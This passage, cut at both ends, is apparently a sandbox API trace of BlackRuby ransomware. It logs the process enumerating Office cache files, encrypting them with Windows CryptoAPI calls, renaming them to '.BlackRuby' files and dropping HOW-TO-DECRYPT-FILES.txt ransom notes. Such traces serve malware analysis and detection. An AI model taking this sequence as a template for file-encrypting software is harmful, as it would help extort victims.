[0045.167] GetLastError () returned 0x0 [0045.167] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cefa18*, pdwDataLen=0x18ed74*=0x710, dwBufLen=0x710 | out: pbData=0x1cefa18*, pdwDataLen=0x18ed74*=0x710) returned 1 [0045.167] GetLastError () returned 0x0 [0045.167] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf0864*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cf0864*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.167] GetLastError () returned 0x0 [0045.167] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cf0894*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cf0894*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.167] GetLastError () returned 0x0 [0045.167] CryptDestroyKey (hKey=0x360ae0) returned 1 [0045.167] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.168] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.168] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0045.168] GetLastError () returned 0x0 [0045.168] SetErrorMode (uMode=0x1) returned 0x0 [0045.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.168] GetLastError () returned 0xb7 [0045.168] GetFileType (hFile=0x184) returned 0x1 [0045.169] SetErrorMode (uMode=0x0) returned 0x1 [0045.169] GetFileType (hFile=0x184) returned 0x1 [0045.170] CloseHandle (hObject=0x184) returned 1 [0045.170] GetLastError () returned 0xb7 [0045.170] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0045.170] GetLastError () returned 0xb7 [0045.171] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Encrypted_acBrZDX3PWXAUWTpinnCZ1cpglN4Z0IPHGN9Vje7GQjo.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Encrypted_acBrZDX3PWXAUWTpinnCZ1cpglN4Z0IPHGN9Vje7GQjo.BlackRuby", lpFilePart=0x0) returned 0x7f [0045.171] GetLastError () returned 0xb7 [0045.171] SetErrorMode (uMode=0x1) returned 0x0 [0045.171] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2320bf60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x720)) returned 1 [0045.171] GetLastError () returned 0xb7 [0045.171] SetErrorMode (uMode=0x0) returned 0x1 [0045.171] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Encrypted_acBrZDX3PWXAUWTpinnCZ1cpglN4Z0IPHGN9Vje7GQjo.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\encrypted_acbrzdx3pwxauwtpinncz1cpgln4z0iphgn9vje7gqjo.blackruby")) returned 1 [0045.173] GetLastError () returned 0xb7 [0045.174] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.174] GetLastError () returned 0xb7 [0045.174] SetErrorMode (uMode=0x1) returned 0x0 [0045.174] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.174] GetLastError () returned 0x5 [0045.175] SetErrorMode (uMode=0x0) returned 0x1 [0045.175] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.175] GetLastError () returned 0x5 [0045.175] SetErrorMode (uMode=0x1) returned 0x0 [0045.175] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1d10314 | out: lpFileInformation=0x1d10314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x362dbb50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0045.176] GetLastError () returned 0x5 [0045.176] SetErrorMode (uMode=0x0) returned 0x1 [0045.176] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.176] GetLastError () returned 0x5 [0045.176] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.176] GetLastError () returned 0x5 [0045.176] SetErrorMode (uMode=0x1) returned 0x0 [0045.176] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.176] GetLastError () returned 0x0 [0045.176] GetFileType (hFile=0x184) returned 0x1 [0045.176] SetErrorMode (uMode=0x0) returned 0x1 [0045.176] GetFileType (hFile=0x184) returned 0x1 [0045.177] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x8f8 [0045.177] GetLastError () returned 0x0 [0045.177] ReadFile (in: hFile=0x184, lpBuffer=0x1d12880, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d12880*, lpNumberOfBytesRead=0x18ed84*=0x8f8, lpOverlapped=0x0) returned 1 [0045.182] GetLastError () returned 0x0 [0045.182] CloseHandle (hObject=0x184) returned 1 [0045.182] GetLastError () returned 0x0 [0045.182] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.182] GetLastError () returned 0x0 [0045.182] SetErrorMode (uMode=0x1) returned 0x0 [0045.182] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x362dbb50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0045.182] GetLastError () returned 0x0 [0045.182] SetErrorMode (uMode=0x0) returned 0x1 [0045.182] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0045.183] GetLastError () returned 0x0 [0045.230] CryptImportKey (in: hProv=0x37c680, pbData=0x1b704ac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0045.230] GetLastError () returned 0x0 [0045.230] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.230] GetLastError () returned 0x0 [0045.235] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.235] GetLastError () returned 0x0 [0045.235] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360aa0) returned 1 [0045.235] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.235] GetLastError () returned 0x0 [0045.235] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1b9d4f8*=0x1, dwFlags=0x0) returned 1 [0045.235] GetLastError () returned 0x0 [0045.235] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1b9d4c4, dwFlags=0x0) returned 1 [0045.236] GetLastError () returned 0x0 [0045.236] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9d540*, pdwDataLen=0x18ed74*=0x9f0, dwBufLen=0x9f0 | out: pbData=0x1b9d540*, pdwDataLen=0x18ed74*=0x9f0) returned 1 [0045.236] GetLastError () returned 0x0 [0045.236] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9e94c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b9e94c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.236] GetLastError () returned 0x0 [0045.236] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b9e97c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b9e97c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.236] GetLastError () returned 0x0 [0045.236] CryptDestroyKey (hKey=0x360a20) returned 1 [0045.236] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.236] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.236] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.236] GetLastError () returned 0x0 [0045.236] SetErrorMode (uMode=0x1) returned 0x0 [0045.236] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.237] GetLastError () returned 0xb7 [0045.237] GetFileType (hFile=0x184) returned 0x1 [0045.237] SetErrorMode (uMode=0x0) returned 0x1 [0045.237] GetFileType (hFile=0x184) returned 0x1 [0045.238] CloseHandle (hObject=0x184) returned 1 [0045.238] GetLastError () returned 0xb7 [0045.238] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.238] GetLastError () returned 0xb7 [0045.238] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Encrypted_NTD6dG8qk0ETwQpar5zR7x3RvAU3QVgJSgP4XmL.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Encrypted_NTD6dG8qk0ETwQpar5zR7x3RvAU3QVgJSgP4XmL.BlackRuby", lpFilePart=0x0) returned 0x7a [0045.238] GetLastError () returned 0xb7 [0045.238] SetErrorMode (uMode=0x1) returned 0x0 [0045.238] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x232a44e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xa00)) returned 1 [0045.238] GetLastError () returned 0xb7 [0045.238] SetErrorMode (uMode=0x0) returned 0x1 [0045.238] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Encrypted_NTD6dG8qk0ETwQpar5zR7x3RvAU3QVgJSgP4XmL.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\encrypted_ntd6dg8qk0etwqpar5zr7x3rvau3qvgjsgp4xml.blackruby")) returned 1 [0045.239] GetLastError () returned 0xb7 [0045.239] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.239] GetLastError () returned 0xb7 [0045.239] SetErrorMode (uMode=0x1) returned 0x0 [0045.239] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.239] GetLastError () returned 0x5 [0045.240] SetErrorMode (uMode=0x0) returned 0x1 [0045.240] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.240] GetLastError () returned 0x5 [0045.241] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0045.249] GetLastError () returned 0x5 [0045.249] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.249] GetLastError () returned 0x5 [0045.249] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.249] GetLastError () returned 0x5 [0045.249] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.249] GetLastError () returned 0x5 [0045.249] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.249] GetLastError () returned 0x5 [0045.249] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.249] GetLastError () returned 0x5 [0045.249] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.249] GetLastError () returned 0x12 [0045.249] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0045.250] SetErrorMode (uMode=0x0) returned 0x1 [0045.250] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0045.251] GetLastError () returned 0x12 [0045.251] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.251] GetLastError () returned 0x12 [0045.251] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.251] GetLastError () returned 0x12 [0045.251] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.251] GetLastError () returned 0x12 [0045.251] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.251] GetLastError () returned 0x12 [0045.251] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.251] GetLastError () returned 0x12 [0045.251] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.251] GetLastError () returned 0x12 [0045.251] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0045.252] SetErrorMode (uMode=0x0) returned 0x1 [0045.252] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1bc0710 | out: lpFileInformation=0x1bc0710*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20354600, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x20354600, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x30ecd270, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1b7a00)) returned 1 [0045.253] GetLastError () returned 0x12 [0045.253] SetErrorMode (uMode=0x0) returned 0x1 [0045.254] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.254] GetLastError () returned 0x0 [0045.254] GetFileType (hFile=0x184) returned 0x1 [0045.254] SetErrorMode (uMode=0x0) returned 0x1 [0045.254] GetFileType (hFile=0x184) returned 0x1 [0045.254] WriteFile (in: hFile=0x184, lpBuffer=0x1bdc11c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1bdc11c*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0045.255] GetLastError () returned 0x0 [0045.255] CloseHandle (hObject=0x184) returned 1 [0045.255] GetLastError () returned 0x0 [0045.255] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.255] GetLastError () returned 0x0 [0045.255] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1bdde28 | out: lpFileInformation=0x1bdde28*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x30ecd270, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x615)) returned 1 [0045.256] GetLastError () returned 0x0 [0045.256] SetErrorMode (uMode=0x0) returned 0x1 [0045.256] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.256] GetLastError () returned 0x0 [0045.256] GetFileType (hFile=0x184) returned 0x1 [0045.256] SetErrorMode (uMode=0x0) returned 0x1 [0045.256] GetFileType (hFile=0x184) returned 0x1 [0045.256] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x615 [0045.256] GetLastError () returned 0x0 [0045.256] ReadFile (in: hFile=0x184, lpBuffer=0x1be016c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1be016c*, lpNumberOfBytesRead=0x18ed84*=0x615, lpOverlapped=0x0) returned 1 [0045.268] GetLastError () returned 0x0 [0045.268] CloseHandle (hObject=0x184) returned 1 [0045.268] GetLastError () returned 0x0 [0045.268] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x30ecd270, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x615)) returned 1 [0045.268] GetLastError () returned 0x0 [0045.268] SetErrorMode (uMode=0x0) returned 0x1 [0045.268] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0045.268] GetLastError () returned 0x0 [0045.300] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c3bb84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360be0) returned 1 [0045.300] GetLastError () returned 0x0 [0045.300] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.300] GetLastError () returned 0x0 [0045.305] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.305] GetLastError () returned 0x0 [0045.305] CryptDuplicateKey (in: hKey=0x360be0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360c20) returned 1 [0045.305] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.305] GetLastError () returned 0x0 [0045.305] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1c68bd0*=0x1, dwFlags=0x0) returned 1 [0045.305] GetLastError () returned 0x0 [0045.305] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1c68b9c, dwFlags=0x0) returned 1 [0045.305] GetLastError () returned 0x0 [0045.305] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c68c18*, pdwDataLen=0x18ed74*=0x710, dwBufLen=0x710 | out: pbData=0x1c68c18*, pdwDataLen=0x18ed74*=0x710) returned 1 [0045.306] GetLastError () returned 0x0 [0045.306] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c69a64*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c69a64*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.306] GetLastError () returned 0x0 [0045.306] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c69a94*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c69a94*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.306] GetLastError () returned 0x0 [0045.306] CryptDestroyKey (hKey=0x360be0) returned 1 [0045.306] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.306] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.306] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.307] GetLastError () returned 0xb7 [0045.307] GetFileType (hFile=0x184) returned 0x1 [0045.307] GetFileType (hFile=0x184) returned 0x1 [0045.308] CloseHandle 